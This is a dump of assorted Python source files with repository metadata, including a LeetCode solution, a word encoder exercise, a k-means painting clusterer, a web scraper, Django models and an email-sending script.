rzymskie={'I':1,'II':2,'III':3,'IV':4,'V':5,'VI':6,'VII':7,'VIII':8}
print(rzymskie)
print('Jeden element slownika: \n')
print(rzymskie['I'])
| 24.666667 | 69 | 0.587838 |
62be0b337ff4bd9e1d305e934c2a552b0ef05ec1
| 791 |
py
|
Python
|
783-minimum-distance-between-bst-nodes/783-minimum-distance-between-bst-nodes.py
|
hyeseonko/LeetCode
|
48dfc93f1638e13041d8ce1420517a886abbdc77
|
[
"MIT"
] | 2 |
2021-12-05T14:29:06.000Z
|
2022-01-01T05:46:13.000Z
|
783-minimum-distance-between-bst-nodes/783-minimum-distance-between-bst-nodes.py
|
hyeseonko/LeetCode
|
48dfc93f1638e13041d8ce1420517a886abbdc77
|
[
"MIT"
] | null | null | null |
783-minimum-distance-between-bst-nodes/783-minimum-distance-between-bst-nodes.py
|
hyeseonko/LeetCode
|
48dfc93f1638e13041d8ce1420517a886abbdc77
|
[
"MIT"
] | null | null | null |
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def minDiffInBST(self, root: Optional[TreeNode]) -> int:
output=[]
stack=[root]
while(stack):
cur = stack.pop(0)
output.append(cur.val)
if cur.left:
stack.append(cur.left)
if cur.right:
stack.append(cur.right)
sorted_output=sorted(output)
diff = sorted_output[1]-sorted_output[0]
for i in range(2,len(sorted_output)):
if sorted_output[i]-sorted_output[i-1]<diff:
diff=sorted_output[i]-sorted_output[i-1]
return diff
| 34.391304 | 60 | 0.558786 |
3d9613c4bf3516cfc004d7af07118d7c31dd361e
| 2,572 |
py
|
Python
|
Uebung10/Aufgabe29.py
|
B0mM3L6000/EiP
|
f68718f95a2d3cde8ead62b6134ac1b5068881a5
|
[
"MIT"
] | 1 |
2018-04-18T19:10:06.000Z
|
2018-04-18T19:10:06.000Z
|
Uebung10/Aufgabe29.py
|
B0mM3L6000/EiP
|
f68718f95a2d3cde8ead62b6134ac1b5068881a5
|
[
"MIT"
] | null | null | null |
Uebung10/Aufgabe29.py
|
B0mM3L6000/EiP
|
f68718f95a2d3cde8ead62b6134ac1b5068881a5
|
[
"MIT"
] | 1 |
2018-04-29T08:48:00.000Z
|
2018-04-29T08:48:00.000Z
|
class Encoder:
def __init__(self, encoding = {}):
self.encoding = encoding
def updateEncoding(self,string1,string2):
list1 = str.split(string1)
list2 = str.split(string2)
self.encoding = {}
for i in range(len(list1)):
self.encoding[list1[i]] = list2[i]
def encode(self, string):
encodedstring = ""
toencode = str.split(string)
for i in range(len(toencode)):
encodedstring += self.encoding[toencode[i]] + " "
return encodedstring
def decode(self, string):
decodedic = {}
for key in self.encoding:
decodedic[self.encoding[key]] = key
decodedstring = ""
todecode = str.split(string)
for i in range(len(todecode)):
decodedstring += decodedic[todecode[i]] + " "
return decodedstring
##################################
"""
29.5:
nein es gilt nicht, wenn z.B. das Dictionary für verschiedene schlüssel gleiche
Bedeutungen hat
z.B. dict erstellt mit den strings:
"haus baum welt"
"rot blau blau"
und übersetzt werden soll:
"baum welt haus"
dann erhält man am ende: "welt welt haus"
"""
#####################################
#sauce foooter:
from random import randint
try:
#Create an Encoder object
enc = Encoder()
# Create two strings
st1 = "Lorem ipsum dolor sit amet consetetur sadipscing elitr sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat voluptua"
st2 = "At vero eos at accusam sit justo duo dolores et ea rebum Stet clita kasd gubergren no sea takimata sanctus est Lorem ipsum"
# set the dictionary
enc.updateEncoding(st1,st2)
# create a random sentence from words of the first sentence
bagOfWords = str.split(st1)
st3 = ""
for i in range(19):
st3 += bagOfWords[randint(0,len(bagOfWords)-1)]+" "
st3 += bagOfWords[1]
# encode the random sentence
st4 = enc.encode(st3)
# decode it
st5 = enc.decode(st4)
# print the random sentence
print("#Encode String:",st3)
# print the encoded sentence
print("#Decode String:",st4)
# print the decoded sentence
print("#Result:",st5)
# in this case: if the random and the decoded sentence are equal, the test is passed
if(str.split(st3) == str.split(st5)):
print("correct")
else:
print("Encoding or Decoding incorrect")
print("Line #Encode String: and Line #Result: should be equal")
except:
print("Some names or functions do not work correctly or are wrongly named")
| 28.263736 | 154 | 0.626361 |
9a969dcb4bdc1a8eee56b110c60c1611472a3520
| 1,834 |
py
|
Python
|
bob-ross/cluster-paintings.py
|
h4ckfu/data
|
bdc02fd5051dfb31e42f8e078832ceead92f9958
|
[
"CC-BY-4.0"
] | 16,124 |
2015-01-01T06:18:12.000Z
|
2022-03-31T00:46:52.000Z
|
bob-ross/cluster-paintings.py
|
h4ckfu/data
|
bdc02fd5051dfb31e42f8e078832ceead92f9958
|
[
"CC-BY-4.0"
] | 179 |
2015-01-07T10:19:57.000Z
|
2022-02-21T21:19:14.000Z
|
bob-ross/cluster-paintings.py
|
h4ckfu/data
|
bdc02fd5051dfb31e42f8e078832ceead92f9958
|
[
"CC-BY-4.0"
] | 12,163 |
2015-01-03T14:23:36.000Z
|
2022-03-31T10:10:23.000Z
|
"""
Clusters Bob Ross paintings by features.
By Walter Hickey <[email protected]>
See http://fivethirtyeight.com/features/a-statistical-analysis-of-the-work-of-bob-ross/
"""
import numpy as np
from scipy.cluster.vq import vq, kmeans, whiten
import math
import csv
def main():
# load data into vectors of 1s and 0s for each tag
with open('elements-by-episode.csv','r') as csvfile:
reader = csv.reader(csvfile)
reader.next() # skip header
data = []
for row in reader:
data.append(map(lambda x: int(x), row[2:])) # exclude EPISODE and TITLE columns
# convert to numpy matrix
matrix = np.array(data)
# remove colums that have been tagged less than 5 times
columns_to_remove = []
for col in range(np.shape(matrix)[1]):
if sum(matrix[:,col]) <= 5:
columns_to_remove.append(col)
matrix = np.delete(matrix, columns_to_remove, axis=1)
# normalize according to stddev
whitened = whiten(matrix)
output = kmeans(whitened, 10)
print "episode", "distance", "cluster"
# determine distance between each of 403 vectors and each centroid, find closest neighbor
for i, v in enumerate(whitened):
# distance between centroid 0 and feature vector
distance = math.sqrt(sum((v - output[0][0]) ** 2))
# group is the centroid it is closest to so far, set initally to centroid 0
group = 0
closest_match = (distance, group)
# test the vector i against the 10 centroids, find nearest neighbor
for x in range (0, 10):
dist_x = math.sqrt(sum((v - output[0][x]) ** 2))
if dist_x < closest_match[0]:
closest_match = (dist_x, x)
print i+1, closest_match[0], closest_match[1]
if __name__ == "__main__":
main()
| 31.084746 | 93 | 0.640676 |
49806a87d676d3fa46db3e3b6f5f01048f4d408e
| 5,142 |
py
|
Python
|
etl/data_extraction/scrapers/sozialeinsatz.py
|
Betadinho/einander-helfen
|
272f11397d80ab5267f39a7b36734495f1c00b0c
|
[
"MIT"
] | 7 |
2020-04-23T20:16:11.000Z
|
2022-01-04T14:57:16.000Z
|
etl/data_extraction/scrapers/sozialeinsatz.py
|
Betadinho/einander-helfen
|
272f11397d80ab5267f39a7b36734495f1c00b0c
|
[
"MIT"
] | 361 |
2020-04-23T17:20:14.000Z
|
2022-03-02T11:29:45.000Z
|
etl/data_extraction/scrapers/sozialeinsatz.py
|
Betadinho/einander-helfen
|
272f11397d80ab5267f39a7b36734495f1c00b0c
|
[
"MIT"
] | 1 |
2021-11-29T06:02:52.000Z
|
2021-11-29T06:02:52.000Z
|
import math
import re
from data_extraction.scraper import Scraper
class SozialeinsatzScraper(Scraper):
"""Scrapes the website www.sozialeinsatz.de."""
base_url = 'https://www.sozialeinsatz.de'
debug = True
def parse(self, response, url):
"""Handles the soupified response of a detail page in the predefined way and returns it"""
self.logger.debug('parse()')
content = response.find('div', {'id': 'content'})
title = content.find('h2')
if title.text == 'Error 404':
return None
task = content.find('h2', string=re.compile(r'Stellenbeschreibung.*')).findNext('p')
organization = title.findNext('div', {'class': 'row'}).find('p')
contact = content.find('h2', string=re.compile(r'Ansprechpartner.*')).findNext('p')
details = content.find('h2', string=re.compile(r'Details.*')).findNext('p')
category_string = details.find('strong', string=re.compile(r'Aufgaben.*')).nextSibling
categories = [x.strip() for x in category_string.split(',')]
categories.append(title.find('acronym')['title'])
timing = details.find('strong', string=re.compile(r'Zeitraum.*')).nextSibling
location = None
location_p = content.find('h2', string=re.compile(r'Einsatzort.*')).findNext('p')
if location_p.a is not None and 'q=' in location_p.a['href']:
location = location_p.a['href'].split('q=')[1]
zipcode = None
if location is not None:
if len(re.findall(r'(\d{5})', location)) > 0:
zipcode = re.findall(r'(\d{5})', location)[0]
parsed_object = {
'title': title.text.strip(),
'categories': categories,
'location': location,
'task': task.decode_contents().strip(),
'target_group': None,
'prerequisites': None,
'language_skills': None,
'timing': timing.strip(),
'effort': None,
'opportunities': None,
'organization': organization.decode_contents().strip() if organization is not None else None,
'contact': contact.decode_contents().strip() if contact is not None else None,
'link': url or None,
'source': 'www.sozialeinsatz.de',
'geo_location': None,
}
parsed_object['post_struct'] = {
'title': parsed_object['title'],
'categories': parsed_object['categories'],
'location': {
'country': 'Deutschland',
'zipcode': zipcode,
'city': None,
'street': None,
},
'task': None,
'target_group': None,
'prerequisites': parsed_object['prerequisites'],
'language_skills': parsed_object['language_skills'],
'timing': parsed_object['timing'],
'effort': None,
'opportunities': None,
'organization': None,
'contact': None,
'link': parsed_object['link'],
'source': parsed_object['source'],
'geo_location': parsed_object['geo_location'],
}
return parsed_object
def add_urls(self):
"""Adds all URLs of detail pages, found on the search pages, for the crawl function to scrape"""
self.logger.debug('add_urls()')
import time
index = 1
index_max = None
search_page_url = f'{self.base_url}/stellenangebote/finden?Stellenangebot_page={index}'
next_page_url = search_page_url
while next_page_url:
response = self.soupify(next_page_url)
# Get tags of individual results
detail_a_tags = response.findAll('a', {'class': 'morelink'})
# Get maximum number of pages
if index_max is None:
summary_text = response.find('div', {'class': 'summary'}).text
entries = int(re.findall(r'(\d+).?$', summary_text)[0])
index_max = math.ceil(entries / 25.0)
self.logger.debug(f'Fetched {len(detail_a_tags)} URLs from {next_page_url} [{index}/{index_max}]')
self.update_fetching_progress(index, index_max)
# Iterate links and add, if not already found
for link_tag in detail_a_tags:
current_link = self.base_url + link_tag['href']
if current_link in self.urls:
self.logger.debug(f'func: add_urls, page_index: {index},'
f' search_page: {search_page_url}, '
f'duplicate_index: {current_link}, '
f'duplicate_index: {self.urls.index(current_link)}')
else:
self.urls.append(current_link)
# Get next result page
if index < index_max:
index += 1
next_page_url = f'{self.base_url}/stellenangebote/finden?Stellenangebot_page={index}'
else:
next_page_url = None
time.sleep(self.delay)
| 36.992806 | 110 | 0.556593 |
62592611062846e8ddc9453d08b3f9cc749f88fa
| 129 |
py
|
Python
|
Python/Courses/Python-Tutorials.Telusko/02.Miscellaneous/20.03-File-handling.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
Python/Courses/Python-Tutorials.Telusko/02.Miscellaneous/20.03-File-handling.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
Python/Courses/Python-Tutorials.Telusko/02.Miscellaneous/20.03-File-handling.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
file = open("text.txt", "r")
file2 = open("text2.txt", "w")
for data in file:
file2.write(data)
file.close()
file2.close()
| 14.333333 | 30 | 0.620155 |
b832db34004caeef160a328496546197b3b692d7
| 1,764 |
py
|
Python
|
SurveyManager/survey/models.py
|
javiervar/SurveyManager
|
bbe2ed356654c32586c587f58c609c8ce014e96b
|
[
"MIT"
] | null | null | null |
SurveyManager/survey/models.py
|
javiervar/SurveyManager
|
bbe2ed356654c32586c587f58c609c8ce014e96b
|
[
"MIT"
] | null | null | null |
SurveyManager/survey/models.py
|
javiervar/SurveyManager
|
bbe2ed356654c32586c587f58c609c8ce014e96b
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class Encuesta(models.Model):
nombre=models.CharField(max_length=150)
descripcion=models.TextField()
estructura=models.TextField()
fecha = models.DateTimeField(auto_now_add=True)
def __str__(self):
return str(self.nombre)
class Pregunta(models.Model):
descripcion=models.CharField(max_length=150)
encuesta = models.ForeignKey('Encuesta', on_delete=models.CASCADE)
tipo=models.IntegerField(null=True)
numero=models.IntegerField(default=1)
json_id=models.CharField(max_length=50,null=True)
def __str__(self):
return str(self.descripcion)
class Respuesta(models.Model):
valor=models.CharField(max_length=150)
pregunta = models.ForeignKey('Pregunta', on_delete=models.CASCADE)
json_id=models.CharField(max_length=50,null=True)
def __str__(self):
return str(self.valor)
class Carrera(models.Model):
nombre=models.CharField(max_length=150)
generacion = models.ForeignKey('Generacion', on_delete=models.CASCADE,null=True,blank=True)
def __str__(self):
return "%s %s" % (self.nombre, self.generacion)
class Generacion(models.Model):
generacion=models.CharField(max_length=150,null=True,blank=True)
def __str__(self):
return str(self.generacion)
class Alumno(models.Model):
email=models.CharField(max_length=100)
nombre=models.CharField(max_length=100)
apellidos=models.CharField(max_length=100)
carrera = models.ForeignKey('Carrera', on_delete=models.CASCADE)
def __str__(self):
return str(self.nombre)
class RespuestaPregunta(models.Model):
respuesta = models.ForeignKey('Respuesta', on_delete=models.CASCADE)
pregunta = models.ForeignKey('Pregunta', on_delete=models.CASCADE)
alumno=models.ForeignKey('Alumno',on_delete=models.CASCADE,blank=True,null=True)
| 30.413793 | 92 | 0.786848 |
b87d4232f38a23242d6a6192e497347e1e6d8428
| 141 |
py
|
Python
|
main/ftpServer.py
|
McUtty/FlowerPlan
|
b0998835356e8e10fe53cad447bc559df2ac7175
|
[
"MIT"
] | null | null | null |
main/ftpServer.py
|
McUtty/FlowerPlan
|
b0998835356e8e10fe53cad447bc559df2ac7175
|
[
"MIT"
] | null | null | null |
main/ftpServer.py
|
McUtty/FlowerPlan
|
b0998835356e8e10fe53cad447bc559df2ac7175
|
[
"MIT"
] | null | null | null |
import uftpd
uftpd.stop()
# uftpd.start([port = 21][, verbose = 1])
uftpd.restart()
# Version abfragen
# wenn neuer - Dateien downloaden
| 12.818182 | 41 | 0.687943 |
b25e6638db74f47962fb3638fca683037c34ed82
| 3,837 |
py
|
Python
|
src/onegov/people/models/membership.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/people/models/membership.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/people/models/membership.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.core.orm import Base
from onegov.core.orm.mixins import ContentMixin
from onegov.core.orm.mixins import TimestampMixin
from onegov.core.orm.mixins import UTCPublicationMixin
from onegov.core.orm.types import UUID
from onegov.search import ORMSearchable
from sqlalchemy import Column
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import Text
from sqlalchemy.orm import backref
from sqlalchemy.orm import object_session
from sqlalchemy.orm import relationship
from uuid import uuid4
class AgencyMembership(Base, ContentMixin, TimestampMixin, ORMSearchable,
UTCPublicationMixin):
""" A membership to an agency. """
__tablename__ = 'agency_memberships'
#: the type of the item, this can be used to create custom polymorphic
#: subclasses of this class. See
#: `<http://docs.sqlalchemy.org/en/improve_toc/\
#: orm/extensions/declarative/inheritance.html>`_.
type = Column(Text, nullable=True)
__mapper_args__ = {
'polymorphic_on': type,
'polymorphic_identity': None,
}
es_public = True
es_properties = {
'title': {'type': 'text'},
}
#: the unique id, part of the url
id = Column(UUID, primary_key=True, default=uuid4)
#: the id of the agency
agency_id = Column(
Integer,
ForeignKey('agencies.id'),
nullable=False
)
#: the related agency (which may have any number of memberships)
agency = relationship(
'Agency',
backref=backref(
'memberships',
cascade='all, delete-orphan',
lazy='dynamic',
order_by='AgencyMembership.order_within_agency'
)
)
#: the id of the person
person_id = Column(UUID, ForeignKey('people.id'), nullable=False)
#: the related person (which may have any number of memberships)
person = relationship(
'Person',
backref=backref(
'memberships',
cascade='all, delete-orphan',
lazy='dynamic',
)
)
#: the position of the membership within the agency
order_within_agency = Column(Integer, nullable=False)
#: the position of the membership within all memberships of a person
order_within_person = Column(Integer, nullable=False)
#: describes the membership
title = Column(Text, nullable=False)
#: when the membership started
since = Column(Text, nullable=True)
@property
def siblings_by_agency(self):
""" Returns a query that includes all siblings by agency, including the item
itself ordered by `order_within_agency`.
"""
query = object_session(self).query(self.__class__)
query = query.order_by(self.__class__.order_within_agency)
query = query.filter(self.__class__.agency == self.agency)
return query
@property
def siblings_by_person(self):
""" Returns a query that includes all siblings by person, including the item
itself ordered by `order_within_person`.
"""
query = object_session(self).query(self.__class__)
query = query.order_by(self.__class__.order_within_person)
query = query.filter(self.__class__.person == self.person)
return query
def vcard(self, exclude=None):
""" Returns the person as vCard (3.0).
Allows to specify the included attributes, provides a reasonable
default if none are specified. Always includes the first and last
name.
"""
if not self.person:
return ''
result = self.person.vcard_object(exclude, include_memberships=False)
line = result.add('org')
line.value = [f"{self.agency.title}, {self.title}"]
line.charset_param = 'utf-8'
return result.serialize()
| 31.195122 | 84 | 0.661194 |
a2a95220c05c2685607d88d70a06cedd80129fc1
| 2,489 |
py
|
Python
|
CareerTinderServer/CareerTinder/migrations/0002_auto_20160918_0011.py
|
sarojaerabelli/HVGS
|
86ec3d2de496540ca439c40f4a0c58c47aa181cf
|
[
"MIT"
] | 1 |
2016-09-18T16:40:27.000Z
|
2016-09-18T16:40:27.000Z
|
CareerTinderServer/CareerTinder/migrations/0002_auto_20160918_0011.py
|
sarojaerabelli/HVGS
|
86ec3d2de496540ca439c40f4a0c58c47aa181cf
|
[
"MIT"
] | null | null | null |
CareerTinderServer/CareerTinder/migrations/0002_auto_20160918_0011.py
|
sarojaerabelli/HVGS
|
86ec3d2de496540ca439c40f4a0c58c47aa181cf
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-09-18 04:11
from __future__ import unicode_literals
import CareerTinder.listfield
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('CareerTinder', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='hiree',
name='date_of_birth',
),
migrations.RemoveField(
model_name='hiree',
name='name',
),
migrations.AddField(
model_name='hiree',
name='college',
field=models.CharField(default='mit', max_length=100),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='degree',
field=models.CharField(choices=[(b'BA', b"Bachelor's"), (b'MA', b"Master's"), (b'DO', b'Doctorate')], default='ba', max_length=10),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='first_name',
field=models.CharField(default='john', max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='last_name',
field=models.CharField(default='doe', max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='major',
field=models.CharField(default='cs', max_length=100),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='year',
field=models.IntegerField(default='2019'),
preserve_default=False,
),
migrations.AddField(
model_name='recruiter',
name='hirees',
field=CareerTinder.listfield.ListField(default=b''),
),
migrations.AlterField(
model_name='company',
name='logo',
field=models.ImageField(upload_to=b'media/logos/'),
),
migrations.AlterField(
model_name='hiree',
name='face_picture',
field=models.ImageField(upload_to=b'media/faces/'),
),
migrations.AlterField(
model_name='hiree',
name='resume_picture',
field=models.FileField(upload_to=b'media/resumes/'),
),
]
| 30.728395 | 143 | 0.546002 |
a2d721ef72b39de52022137d721dac292cbddcad
| 890 |
py
|
Python
|
Python/Topics/Sending-Email/05-pdf-attachment.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
Python/Topics/Sending-Email/05-pdf-attachment.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
Python/Topics/Sending-Email/05-pdf-attachment.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
import imghdr
import smtplib
import os
from email.message import EmailMessage
EMAIL_ADDRESS = os.environ.get("GMAIL_ADDRESS")
EMAIL_PASSWORD = os.environ.get("GMAIL_APP_PASS")
pdfs = ["/home/shihab4t/Downloads/Profile.pdf"]
with smtplib.SMTP_SSL("smtp.gmail.com", 465) as smtp:
smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)
reciver = "[email protected]"
msg = EmailMessage()
msg["Subject"] = "Grab dinner this weekend? 2"
msg["From"] = EMAIL_ADDRESS
msg["To"] = reciver
msg.set_content("How about dinner at 6pm this Saturday")
for pdf in pdfs:
with open(pdf, "rb") as pdf:
pdf_data = pdf.read()
pdf_name = pdf.name
msg.add_attachment(pdf_data, maintype="application",
subtype="octet-stream", filename=pdf_name)
smtp.send_message(msg)
print(f"Email was sented to {reciver}")
| 26.969697 | 69 | 0.665169 |
3be1c8da8fb0704e33d69f4791863e002d5b116a
| 2,045 |
py
|
Python
|
examples/nowcoder/SQL3/models.py
|
zhengtong0898/django-decode
|
69680853a4a5b07f6a9c4b65c7d86b2d401a92b1
|
[
"MIT"
] | 5 |
2020-07-14T07:48:10.000Z
|
2021-12-20T21:20:10.000Z
|
examples/nowcoder/SQL3/models.py
|
zhengtong0898/django-decode
|
69680853a4a5b07f6a9c4b65c7d86b2d401a92b1
|
[
"MIT"
] | 7 |
2021-03-26T03:13:38.000Z
|
2022-03-12T00:42:03.000Z
|
examples/nowcoder/SQL3/models.py
|
zhengtong0898/django-decode
|
69680853a4a5b07f6a9c4b65c7d86b2d401a92b1
|
[
"MIT"
] | 1 |
2021-02-16T07:04:25.000Z
|
2021-02-16T07:04:25.000Z
|
from django.db import models
# 1. Django不支持符合主键(Composite Primary Key).
# 2. Django不支持关闭主键(Disable Primary Key),
# 当表中的所有字段都没有定义 Primary Key 时,
# Django会自动增加一个id字段, 并将primary key设定到id字段上.
#
#
# 一般情况下, InnoDB在建表时, 当没有定义Primary Key时,
# 如果有 Unique Key 时, InnoDB会将该Unique Key当作聚集索引.
# 如果也没有 Unique Key时, InnoDB会创建一个隐藏的PrimaryKey(聚集索引).
#
#
# 所以, 像这样的建表语句, Model无法百分之百还原.
# CREATE TABLE `salaries` (
# `emp_no` int(11) NOT NULL,
# `salary` int(11) NOT NULL,
# `from_date` date NOT NULL,
# `to_date` date NOT NULL,
# PRIMARY KEY (`emp_no`,`from_date`)
# );
class salaries(models.Model):
"""
CREATE TABLE `SQL3_dept_manager` (
`id` integer AUTO_INCREMENT NOT NULL PRIMARY KEY,
`dept_no` varchar(4) NOT NULL,
`emp_no` integer NOT NULL,
`to_date` date NOT NULL
);
ALTER TABLE `SQL3_salaries` ADD CONSTRAINT `uc_emp_no_from_date` UNIQUE (`emp_no`, `from_date`);
"""
emp_no = models.IntegerField(verbose_name="员工编号", null=False)
salary = models.IntegerField(verbose_name="薪资", null=False)
from_date = models.DateField(verbose_name="from_date", null=False)
to_date = models.DateField(verbose_name="to_date", null=False)
class Meta:
constraints = [models.UniqueConstraint(fields=['emp_no', 'from_date'], name="uc_emp_no_from_date"), ]
class dept_manager(models.Model):
"""
CREATE TABLE `SQL3_salaries` (
`id` integer AUTO_INCREMENT NOT NULL PRIMARY KEY,
`emp_no` integer NOT NULL,
`salary` integer NOT NULL,
`from_date` date NOT NULL,
`to_date` date NOT NULL
);
ALTER TABLE `SQL3_dept_manager` ADD CONSTRAINT `uc_emp_no_dept_no` UNIQUE (`emp_no`, `dept_no`);
"""
dept_no = models.CharField(verbose_name="部门编号", max_length=4, null=False)
emp_no = models.IntegerField(verbose_name="员工编号", null=False)
to_date = models.DateField(verbose_name="to_date", null=False)
class Meta:
constraints = [models.UniqueConstraint(fields=['emp_no', 'dept_no'], name="uc_emp_no_dept_no"), ]
| 33.52459 | 109 | 0.684597 |
ce0dbcf0753017f4de48e972ead2feb9166619cc
| 6,373 |
py
|
Python
|
text_clf/data_load.py
|
kejunxiao/TextClf
|
aa1c195cb5908c32a3e6ed6891142603cb198d87
|
[
"BSD-3-Clause"
] | 2 |
2018-05-13T13:00:10.000Z
|
2018-05-13T13:00:12.000Z
|
text_clf/data_load.py
|
kejunxiao/TextClf
|
aa1c195cb5908c32a3e6ed6891142603cb198d87
|
[
"BSD-3-Clause"
] | null | null | null |
text_clf/data_load.py
|
kejunxiao/TextClf
|
aa1c195cb5908c32a3e6ed6891142603cb198d87
|
[
"BSD-3-Clause"
] | null | null | null |
"""
data preprocessing and get batch
"""
import os
import re
import logging
import itertools
from collections import Counter
import numpy as np
import pandas as pd
class DataLoad(object):
logging.getLogger().setLevel(logging.INFO)
def __init__(self, data_path, batch_size, num_epochs, dev_sample_rate, forced_seq_len=None):
"""
params:
data_path: source data path
mode: 'tarin' or 'dev'
dev_sample_rate: percentage of the training data to use for validation
"""
self.data_path = data_path
self.batch_size = batch_size
self.num_epochs = num_epochs
self.forced_seq_len = forced_seq_len
self.dev_sample_rate = dev_sample_rate
self._load_data()
def train_batch_iter(self, shuffle=True):
"""
params:
returns:
"""
x, y, data_size = self._split_train_dev('train')
num_batchs_per_epoch = data_size // self.batch_size + 1
for _ in range(self.num_epochs):
if shuffle:
shuffled_indices = np.random.permutation(np.arange(data_size))
x, y = x[shuffled_indices], y[shuffled_indices]
for i in range(num_batchs_per_epoch):
start_idx = i * self.batch_size
end_idx = min((i+1) * self.batch_size, data_size)
yield x[start_idx:end_idx], y[start_idx:end_idx]
def get_dev_data(self, shuffle=True):
"""
params:
returns:
"""
dev_x, dev_y, dev_size = self._split_train_dev('dev')
if shuffle:
shuffled_indices = np.random.permutation(np.arange(dev_size))
dev_x, dev_y = dev_x[shuffled_indices], dev_y[shuffled_indices]
return dev_x, dev_y
@staticmethod
def _clean_str(s):
s = re.sub(r"[^A-Za-z0-9:(),!?\'\`]", " ", s)
s = re.sub(r" : ", ":", s)
s = re.sub(r"\'s", " \'s", s)
s = re.sub(r"\'ve", " \'ve", s)
s = re.sub(r"n\'t", " n\'t", s)
s = re.sub(r"\'re", " \'re", s)
s = re.sub(r"\'d", " \'d", s)
s = re.sub(r"\'ll", " \'ll", s)
s = re.sub(r",", " , ", s)
s = re.sub(r"!", " ! ", s)
s = re.sub(r"\(", " \( ", s)
s = re.sub(r"\)", " \) ", s)
s = re.sub(r"\?", " \? ", s)
s = re.sub(r"\s{2,}", " ", s)
return s.strip().lower()
def _load_data(self):
"""
params:
returns:
x: 2D np.array
samples, dimension is (N, self.forced_seq_len)
y: 2D np.array
labels, dimension is (N, len(labels))
token2id: python dict object
id2token: python dict object
df: pd.DataFrame
labels: 1D np.array
"""
df = pd.read_csv(self.data_path)
selected_cols = ['Descript', 'Category']
df = df.loc[:, selected_cols].dropna(axis=0, how='any')
# construct label one-hot vectors
labels = np.unique(
np.array(df.loc[:, selected_cols[1]], dtype=np.object))
one_hot = np.zeros([len(labels), len(labels)], np.float)
np.fill_diagonal(one_hot, 1)
# {laebl: one hot vector for this label}
labels2vec = dict(zip(labels, one_hot))
raw_x = np.array(df.loc[:, selected_cols[0]].apply(
lambda x: DataLoad._clean_str(x).split(' ')), dtype=np.object)
raw_y = df.loc[:, selected_cols[1]].apply(
lambda y: labels2vec[y]).tolist()
# padding sentence
padded_x = self._pad_sentence(raw_x)
token2id = self._build_vocab(padded_x)
x = []
for sent in padded_x:
xs = []
for token in sent:
if token not in token2id:
token = '<OOV>'
xs.append(token2id[token])
x.append(xs)
self.x = np.array(x, dtype=np.int64)
self.y = np.array(raw_y, dtype=np.float)
def _split_train_dev(self, mode):
# split data into train set or dev set
data_size = self.x.shape[0]
dev_size = int(data_size * self.dev_sample_rate)
train_size = data_size - dev_size
# maybe using cross-validation is better
if mode == 'train':
return self.x[:train_size], self.y[:train_size], train_size
elif mode == 'dev':
return self.x[dev_size:], self.y[dev_size:], dev_size
else:
raise ValueError('mode shoudle be train or dev.')
def _pad_sentence(self, sentences, padding_word='<PAD>'):
if self.forced_seq_len is None:
# forced_seq_len = max length of all sentences
self.forced_seq_len = max([len(sent) for sent in sentences])
padded_sentences = []
for sent in sentences:
if len(sent) < self.forced_seq_len:
sent.extend([padding_word] * (self.forced_seq_len-len(sent)))
padded_sent = sent
elif len(sent) > self.forced_seq_len:
logging.info('Because the length of the sentence is larger the self.forced_seq_len,'
'so need to cut off the sentence.')
padded_sent = sent[:self.forced_seq_len]
padded_sentences.append(padded_sent)
return padded_sentences
def _build_vocab(self, sentences):
tokens_count = Counter(itertools.chain(*sentences))
vocab = [token[0]
for token in tokens_count.most_common(self.forced_seq_len)]
vocab += ['<OOV>'] # out of vocablary
token2id = {token: i for i, token in enumerate(vocab)}
self.vocab_size = len(vocab)
return token2id
if __name__ == '__main__':
params = {
'data_path': '../dataset/San_Francisco_Crime/train.csv.zip',
'batch_size': 32,
'num_epochs': 200,
'forced_seq_len': 14,
'dev_sample_rate':0.05
}
data = DataLoad(data_path=params['data_path'],
batch_size=params['batch_size'],
num_epochs=params['num_epochs'],
forced_seq_len=params['forced_seq_len'],
dev_sample_rate=params['dev_sample_rate'])
batches = data.train_batch_iter()
batch_x, batch_y = next(batches)
# print(len(batches))
print(batch_x.shape)
print(batch_y.shape)
| 35.209945 | 100 | 0.557822 |
ce3501af1f45e1223934bba47fc0e9a49f9b32bd
| 1,669 |
py
|
Python
|
BITs/2014/Kozlov_A_D/task_8_11.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
BITs/2014/Kozlov_A_D/task_8_11.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
